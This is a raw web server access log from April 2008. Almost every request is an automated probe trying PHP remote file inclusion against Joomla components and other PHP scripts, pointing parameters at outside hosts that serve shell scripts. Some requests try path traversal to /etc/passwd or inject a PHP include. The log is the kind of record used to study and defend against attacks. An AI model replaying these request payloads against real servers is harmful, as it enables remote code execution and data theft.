72.29.81.233 - - [01/Apr/2008:08:45:58 -0700] "GET /componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.233 - - [01/Apr/2008:08:46:20 -0700] "GET /logs/access_080207.log/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.233 - - [01/Apr/2008:08:46:20 -0700] "GET /logs/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.233 - - [01/Apr/2008:08:46:27 -0700] "GET /logs/access_080128.log/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:47:13 -0700] "GET /logs/access_080125.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:47:15 -0700] "GET /logs/access_080125.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.107.66.224 - - [01/Apr/2008:08:47:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://mamika.net///wp-content/uploads/2007/03/cmd.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
89.107.66.224 - - [01/Apr/2008:08:47:16 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://mamika.net///wp-content/uploads/2007/03/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
213.203.223.3 - - [01/Apr/2008:08:47:27 -0700] "GET /logs/access_080131.log/index.php?pagina=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.3 - - [01/Apr/2008:08:47:27 -0700] "GET /index.php?pagina=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.3 - - [01/Apr/2008:08:47:27 -0700] "GET /logs/index.php?pagina=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:47:37 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:47:38 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:47:38 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.157.174.120 - - [01/Apr/2008:08:47:46 -0700] "GET /index.php?s=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:08:47:53 -0700] "GET /logs/examples%5CpatExampleGen%5CbbcodeSource.php?example=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:08:47:58 -0700] "GET /examples%5CpatExampleGen%5CbbcodeSource.php?example=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.130.242.135 - - [01/Apr/2008:08:48:07 -0700] "GET /logs/access_071226.log//include/lib/lib_head.php?cfgPathModule=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [01/Apr/2008:08:48:07 -0700] "GET //include/lib/lib_head.php?cfgPathModule=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [01/Apr/2008:08:48:08 -0700] "GET /logs//include/lib/lib_head.php?cfgPathModule=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.65.76.195 - - [01/Apr/2008:08:48:19 -0700] "GET /logs/access_071226.log//include/lib/lib_head.php?cfgPathModule=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [01/Apr/2008:08:48:19 -0700] "GET //include/lib/lib_head.php?cfgPathModule=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [01/Apr/2008:08:48:20 -0700] "GET /logs//include/lib/lib_head.php?cfgPathModule=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [01/Apr/2008:08:48:37 -0700] "GET /componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:08:48:39 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.16.55 - - [01/Apr/2008:08:48:39 -0700] "GET /logs/access_071226.log//include/lib/lib_head.php?cfgPathModule=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.16.55 - - [01/Apr/2008:08:48:39 -0700] "GET //include/lib/lib_head.php?cfgPathModule=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.16.55 - - [01/Apr/2008:08:48:40 -0700] "GET /logs//include/lib/lib_head.php?cfgPathModule=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:08:48:40 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.52.57 - - [01/Apr/2008:08:49:26 -0700] "GET /davep/?S=D HTTP/1.0" 200 647 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:49:43 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [01/Apr/2008:08:50:07 -0700] "GET //include/lib/lib_head.php?cfgPathModule=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.205.178.120 - - [01/Apr/2008:08:50:23 -0700] "GET //include/lib/lib_head.php?cfgPathModule=http://www.markbadmintonclub.co.uk/calendar/tools/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.130.242.135 - - [01/Apr/2008:08:50:24 -0700] "GET //include/lib/lib_head.php?cfgPathModule=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.27.166 - - [01/Apr/2008:08:50:50 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=wwww.hotnews.altervista.org/cmd2.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.166 - - [01/Apr/2008:08:50:51 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=wwww.hotnews.altervista.org/cmd2.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.130.242.135 - - [01/Apr/2008:08:51:19 -0700] "GET /logs/access_071226.log//include/lib/lib_head.php?cfgPathModule=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [01/Apr/2008:08:51:19 -0700] "GET //include/lib/lib_head.php?cfgPathModule=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [01/Apr/2008:08:51:19 -0700] "GET /logs//include/lib/lib_head.php?cfgPathModule=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:51:27 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:51:28 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:51:29 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:08:52:11 -0700] "GET /index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.105 - - [01/Apr/2008:08:52:26 -0700] "GET /tmp/?N=D HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
157.100.153.34 - - [01/Apr/2008:08:52:32 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:08:52:39 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:08:52:56 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://h1.ripway.com/kambe/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:08:53:06 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.205.178.120 - - [01/Apr/2008:08:53:29 -0700] "GET /logs/access_071226.log//include/lib/lib_head.php?cfgPathModule=http://www.markbadmintonclub.co.uk/calendar/tools/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [01/Apr/2008:08:53:30 -0700] "GET /logs//include/lib/lib_head.php?cfgPathModule=http://www.markbadmintonclub.co.uk/calendar/tools/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:54:11 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:54:11 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:54:11 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:54:11 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:54:12 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:54:12 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:08:54:12 -0700] "GET /logs/access_080218.log//include/functions_common.php?gl_root_path=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:08:54:14 -0700] "GET /logs/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:08:54:15 -0700] "GET /mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:08:54:23 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:08:54:23 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:08:54:23 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:08:54:27 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:08:54:27 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:08:54:27 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:54:32 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:54:36 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:54:36 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:54:37 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:54:43 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.119 - - [01/Apr/2008:08:54:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.170 - - [01/Apr/2008:08:54:49 -0700] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:54:54 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.123.108.73 - - [01/Apr/2008:08:55:25 -0700] "GET /logs/access_080215.log/index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [01/Apr/2008:08:55:25 -0700] "GET /logs/index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [01/Apr/2008:08:55:26 -0700] "GET /logs/access_080225.log/index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:55:41 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:55:42 -0700] "GET /classes/core/language.php?rootdir=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:08:55:42 -0700] "GET /administrator/components/com_jjgery/admin.jjgery.php?mosConfig_absolute_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:08:55:43 -0700] "GET /logs/administrator/components/com_jjgery/admin.jjgery.php?mosConfig_absolute_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.3.249.71 - - [01/Apr/2008:08:56:57 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.3.249.71 - - [01/Apr/2008:08:56:57 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:57:18 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:57:18 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:57:19 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
152.74.96.144 - - [01/Apr/2008:08:57:21 -0700] "GET /logs/access.log//db.php?commonpath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
152.74.96.144 - - [01/Apr/2008:08:57:21 -0700] "GET //db.php?commonpath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
152.74.96.144 - - [01/Apr/2008:08:57:22 -0700] "GET /logs//db.php?commonpath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:57:40 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:57:47 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:08:57:57 -0700] "GET /logs/access_071226.log//include/lib/lib_head.php?cfgPathModule=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:08:57:57 -0700] "GET //include/lib/lib_head.php?cfgPathModule=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:08:57:58 -0700] "GET /logs//include/lib/lib_head.php?cfgPathModule=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.102.153 - - [01/Apr/2008:08:58:10 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
87.118.102.153 - - [01/Apr/2008:08:58:10 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:08:58:32 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:08:58:32 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:08:58:32 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:08:58:33 -0700] "GET /logs/access_071226.log//include/lib/lib_head.php?cfgPathModule=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:08:58:34 -0700] "GET //include/lib/lib_head.php?cfgPathModule=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:08:58:34 -0700] "GET /logs//include/lib/lib_head.php?cfgPathModule=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:08:59:39 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:08:59:39 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:08:59:45 -0700] "GET /logs/access_071226.log//include/lib/lib_head.php?cfgPathModule=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:08:59:47 -0700] "GET //include/lib/lib_head.php?cfgPathModule=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:08:59:48 -0700] "GET /logs//include/lib/lib_head.php?cfgPathModule=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:59:52 -0700] "GET /logs////////////////modules/vwar/convert/mvcw.php?step=1&vwar_root=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:59:52 -0700] "GET ////////////////modules/vwar/convert/mvcw.php?step=1&vwar_root=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.24.154 - - [01/Apr/2008:09:00:12 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.24.154 - - [01/Apr/2008:09:00:13 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.24.154 - - [01/Apr/2008:09:00:13 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:09:00:16 -0700] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:09:00:16 -0700] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
70.86.24.154 - - [01/Apr/2008:09:00:26 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
